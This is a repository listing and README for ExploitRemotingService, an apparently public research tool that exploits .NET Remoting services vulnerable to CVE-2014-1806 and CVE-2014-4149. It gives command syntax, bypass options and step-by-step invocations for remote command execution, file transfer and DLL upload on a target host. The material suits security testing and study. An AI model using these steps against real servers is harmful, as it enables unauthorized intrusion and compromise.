https://github.com/tyranid/exploitremotingservice

A tool to exploit .NET Remoting Services
https://github.com/tyranid/exploitremotingservice

Last synced: 9 days ago
JSON representation

A tool to exploit .NET Remoting Services

• Host: GitHub
• URL: https://github.com/tyranid/exploitremotingservice
• Owner: tyranid
• License: gpl-3.0
• Created: 2014-11-14T18:43:15.000Z (almost 10 years ago)
• Default Branch: master
• Last Pushed: 2024-07-31T09:25:52.000Z (3 months ago)
• Last Synced: 2024-08-01T09:24:29.623Z (3 months ago)
• Language: C#
• Size: 76.2 KB
• Stars: 467
• Watchers: 25
• Forks: 111
• Open Issues: 4
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
ExploitRemotingService (c) 2014 James Forshaw

=============================================

A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.

It only works on Windows although some aspects _might_ work in Mono on *nix.

NOTE: The vulnerable service provided in this repo has intentionally disabled the 

security fix so that you can test the tools are working. This shouldn't be a common

configuration.

Usage Instructions:

===================


ExploitRemotingService [options] uri command [command args]

Copyright (c) James Forshaw 2014


Uri:

The supported URI are as follows:

tcp://host:port/ObjName   - TCP connection on host and portname

ipc://channel/ObjName     - Named pipe channel

Options:

  -s, --secure               Enable secure mode

  -p, --port=VALUE           Specify the local TCP port to listen on

  -i, --ipc=VALUE            Specify listening pipe name for IPC channel

      --user=VALUE           Specify username for secure mode

      --pass=VALUE           Specify password for secure mode

      --ver=VALUE            Specify version number for remote, 2 or 4

      --usecom               Use DCOM backchannel instead of .NET remoting

      --remname=VALUE        Specify the remote object name to register

  -v, --verbose              Enable verbose debug output

      --useser               Uses old serialization tricks, only works on

                               full type filter services

      --uselease             Uses new serialization tricks by abusing lease

                               mechanism.

      --nulluri              Don't send the URI header to the server

      --autodir              When useser is specified try and automatically

                               work out the installdir parameter from the

                               server's current directory.

      --installdir=VALUE     Specify the install directory of the service

                               executable to enable full support with useser

  -h, -?, --help

Commands:

exec [-wait] program [cmdline]: Execute a process on the hosting server

cmd  cmdline                  : Execute a command line process and display stdout

put  localfile remotefile     : Upload a file to the hosting server

get  remotefile localfile     : Download a file from the hosting server

ls   remotedir                : List a remote directory

run  file [args]              : Upload and execute an assembly, calls entry point

user                          : Print the current username

ver                           : Print the OS version

raw base64_object             : Send a raw serialized object to the service



This tool supports exploit both TCP remoting services and local IPC services. To test 

the exploit you need to know the name of the .NET remoting service and the port it's

listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find 

this in the server or client code. Look for things like calls to:

RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance

You can then try the exploit by constructing an appropriate URL. If TCP you can use the 

URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName. 

A simple test is to do:

ExploitRemotingService SERVICEURL ver

If successful it should print the OS version of the hosting .NET remoting service. If 

you get an exception it might be fixed with CVE-2014-1806. At this point try the COM 

version using:

ExploitRemotingService -usecom SERVICEURL ver

This works best locally but can work remotely if you modify the COM configuration and

disable the firewall you should be able to get it to work. If that still doesn't work

then it might be an up to date server. Instead you can also try the full serialization 

version using.

ExploitRemotingService -useser SERVICEURL ls c:\

For this to work the remoting service must be running with full typefilter mode enabled

(which is some, especially IPC services). It also only works with the commands ls, put

and get. But that should be enough to compromise a box. 

ExploitRemotingService -uselease SERVICEURL ls c:\

This mode bypasses low typefilter mode to get serialization tricks to work. It also only 

works with the commands ls, put and get. But that should be enough to compromise a box. 

ExploitRemotingService -uselease -autodir SERVICEURL exec notepad

The autodir option tries to work out the location of the service and will upload a DLL

to enable full remoting support including exec.